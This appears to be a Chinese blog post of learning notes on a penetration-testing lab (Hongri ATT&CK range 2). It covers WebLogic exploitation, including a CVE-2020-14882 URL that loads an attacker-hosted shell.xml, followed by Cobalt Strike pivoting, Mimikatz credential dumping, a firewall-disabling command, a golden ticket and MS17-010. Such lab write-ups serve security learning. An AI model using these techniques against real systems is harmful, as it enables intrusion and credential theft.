内网渗透实战——红日ATT&CK系列靶场(二)学习笔记

目录

一、环境搭建

0.靶场下载

1.IP/网络配置

2.开启web服务

二、外网

1.端口扫描

2.weblogic getshell

2.1工具扫描

2.2未授权访问

2.3cve-2020-14882(失败)

2.4cve-2019-2725(msf)

3.信息收集:

3.1查看ip信息

3.2收集网络信息

3.3查看靶机系统配置

3.4查看补丁信息

3.5查看安装的程序

3.6查看进程

3.7进程迁移

3.8msf提权(失败)

3.9uca提权(失败)

4.CobaltStrike(CS)

4.1启动CS

4.2msf联动CS

4.3Mimikatz获取主机凭证

4.4提权

4.5关闭防火墙

4.6信息收集

4.7横向移动

4.8远程桌面

三、内网

1.内网信息收集

2.黄金票据TGT

3.ms17-010

4.SMB远程桌面口令猜测


一、环境搭建

0.靶场下载

官方下载地址(实验文档):

漏洞详情

个人网盘下载靶场环境:

链接:https://pan.baidu.com/s/1fJBFae5haKqa2ZjIPFXu_w 
提取码:91r9 

1.IP/网络配置

1.1为方便实验这里修改一下虚拟网络,将nat模式下的网段修改为192.168.111.0

1.2建立内网,新建VMent6,设置为仅主机模式,子网地址为10.10.10.0

1.3靶场虚拟机IP设置,并修改PC与WEB网络适配器2为自定义VMent6

WEB192.168.111.8010.10.10.80
PC192.168.111.20110.10.10.201
DC10.10.10.10
kali192.168.111.128

Ps:虚拟机内的IP官方已经配好了。

1.4测试连通性:

若不通可以暂时先将靶机内的防火墙关掉。

2.开启web服务

2.1进入WBE到C:\Oracle\Middleware\user_projects\domains\base_domain\bin,使用管理员模式依次执行脚本(如图)

2.2开启后在kali登录weblogic服务界面查看

Weblogic登录界面:http://192.168.111.80:7001/console

二、外网

1.端口扫描

nmap 192.168.111.80

可以看到目标机开启了80、135、139、445、1433、3389、7001等端口。

445端口存在SMB服务,可能有MS17_010永恒之蓝漏洞
3389端口远程桌面服务,可以尝试连接以此进入内网
7001端口Weblogic服务,可能存在与之相关的漏洞
nmap 192.168.111.201

使用nmap vuln扫描192.168.111.80靶机,观察可能存在的漏洞:

nmap 192.168.111.80 --script vuln

2.weblogic getshell

2.1工具扫描

使用weblogicscan工具扫描可能存在的漏洞:

python WeblogicScan.py 192.168.111.80 7001

工具地址:https://github.com/dr0op/WeblogicScan.git

使用weblogicScanner扫描目标(推荐):

已将可能存在的漏洞总结。

┌──(root㉿kali)-[~/weblogicScanner-master]

└─# python ws.py -t 192.168.111.80           

[22:56:52][INFO] [*][Weblogic Console][192.168.111.80:7001] Start...

[22:56:52][INFO] [+][Weblogic Console][192.168.111.80:7001] Found module!

[22:56:52][INFO] [*][Weblogic Console][192.168.111.80:7001] Please verify manually!

[22:57:12][INFO] [+][CVE-2017-3248][192.168.111.80:7001] Exists vulnerability!

[22:57:12][INFO] [+][CVE-2017-3506][192.168.111.80:7001] Exists vulnerability!

[22:57:12][INFO] [+][CVE-2017-10271][192.168.111.80:7001] Exists vulnerability!

[22:57:16][INFO] [+][CVE-2018-2628][192.168.111.80:7001] Exists vulnerability!

[22:57:20][INFO] [+][CVE-2018-2893][192.168.111.80:7001] Exists vulnerability!

[22:57:29][INFO] [+][CVE-2018-3245][192.168.111.80:7001] Exists vulnerability!

[22:57:39][INFO] [+][CVE-2019-2725][192.168.111.80:7001] Exists vulnerability!

[22:57:42][INFO] [+][CVE-2019-2729][192.168.111.80:7001] Exists vulnerability!

[22:57:57][INFO] [+][CVE-2020-2555][192.168.111.80:7001] Exists vulnerability!

[22:58:01][INFO] [+][CVE-2020-2883][192.168.111.80:7001] Exists vulnerability!

[22:58:04][INFO] [+][CVE-2020-14882][192.168.111.80:7001] Exists vulnerability!

其他命令:

#检测所有的漏洞,保存为json文件

python ws.py -t 192.168.111.80 -o result

#指定探测的CVE编号

python ws.py -t 192.168.128.142 -o result -v CVE-2020-14882

工具地址:

登录 - Gitee.com

2.2未授权访问

http://192.168.111.80:7001/console/css/%252e%252e%252fconsole.portal

2.3cve-2020-14882(失败)

通过观察weblogic界面,可以发现该weblogic版本为10.3.6.0,所以只能通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext类实现cve-2020-14882漏洞的利用。

首先构建一个xml脚本,并上传到kali上,同时web靶机可以访问到kali。

在Kali机上开启http服务,同时开启nc监听:

利用漏洞类让服务器访问攻击机的xml文件:

http://192.168.111.80:7001/console/css/%252e%252e%252fconsole.portal?nfpb=true&pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.111.128:8000/shell.xml")

观察发现web机可以访问,但无法getshell。

2.4cve-2019-2725(msf)

首先查找漏洞模块:

设置好session:

执行,成功:

Shell:

3.信息收集:

3.1查看ip信息

发现内网网段10.10.10.0(为防止乱码可以输入chcp 65001)

3.2收集网络信息

3.3查看靶机系统配置

3.4查看补丁信息

3.5查看安装的程序

发现目标机安装了360安全卫士

收集到的程序信息以txt文件形式保存到隐藏目录内:

3.6查看进程

3.7进程迁移

3.8msf提权(失败)

3.9uca提权(失败)

提示已处于提升状态,可能是因为当前为管理员权限。

4.CobaltStrike(CS)

4.1启动CS

在kali上运行CS服务端,设置密码为123456:

在win10运行CS,输入服务端ip及密码:

4.2msf联动CS

在CS新建监听Listener,kali的ip并设置端口为6666

回到msf,background,设置session并执行:

观察到Win10的CS成功上线:

4.3Mimikatz获取主机凭证

发现域de1ay,密码1qaz@WSX

4.4提权

提权成功:

4.5关闭防火墙

netsh advfirewall set allprofiles state off

4.6信息收集

获取ip信息,发现内网及域:

查看用户组:Shell net localgroup

端口扫描,尝试连接3389端口(成功):

成功:

4.7横向移动

先建立一个smb监听:

选择之前连接的内网DC:

选择用户密码、监听session,Launch执行:

横向移动成功:

4.8远程桌面

三、内网

1.内网信息收集

1.1查看内网靶机系统配置:

1.2收集补丁信息:

1.3查看域存活主机:

1.4查看ip地址:

1.5关闭防火墙:

1.6端口扫描:

2.黄金票据TGT

2.1获取hash值:krbtgt:502:aad3b435b51404eeaad3b435b51404ee

2.2制作黄金票据:

(使用CS的mimikatz获取sid)

2.3成功执行:

3.ms17-010

3.1通过CS将msf带入内网,首先在CS上建立SOCKS:

3.2进入Proxy Pivots:

3.3在kali上运行msf,让msf所有模块流量都从CS的socks代理走:

3.4使用msf辅助模块进行扫描,查看是否存在ms17-010漏洞

3.5存在该漏洞,利用:

3.6添加用户:

查看,添加用户成功:

3.7把添加的用户加入管理员组:

成功:

3.8通过ms17_010开启23端口与telnet服务:

之后开启telnet:

结果失败力。

4.SMB远程桌面口令猜测

使用msf的smb_login模块,设置sessions,并尝试利用收集到的用户名以及密码,成功:

  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值